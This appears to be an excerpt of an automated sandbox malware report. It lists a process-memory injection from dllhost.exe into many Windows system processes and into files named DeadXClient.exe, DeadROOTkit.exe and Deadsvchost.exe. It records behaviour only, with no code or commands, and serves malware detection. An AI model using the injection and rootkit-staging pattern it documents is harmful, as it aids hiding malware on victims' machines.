                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B940000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166930000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8BA0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 151C5AA0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F8FD0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16BF33D0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1A348770000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2FB0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1F3EAD60000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 18686DD0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 24F4DB10000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27E6F950000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2DC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13E0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E20000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 15B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2B60000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1350000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1310000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1270000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: AA0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2F40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1150000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C20000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1380000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 900000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 14C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9F0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13F0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 510000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 6E0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9E0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E30000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EA0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13D0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 870000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B90000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1A0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F10000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1390000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1470000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 910000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EE0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 3B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 790000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 8C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1210000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: DA0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C60000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\DeadXClient.exe base: 1B410000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1B9F0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13B38860000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F080000000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1EF2F790000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 24D21B40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2023BB50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\schtasks.exe base: 1A8EC190000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2CCE00B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 560000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 940000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Local\DeadROOTkit.exe base: 11C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF60000Jump to behavior
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
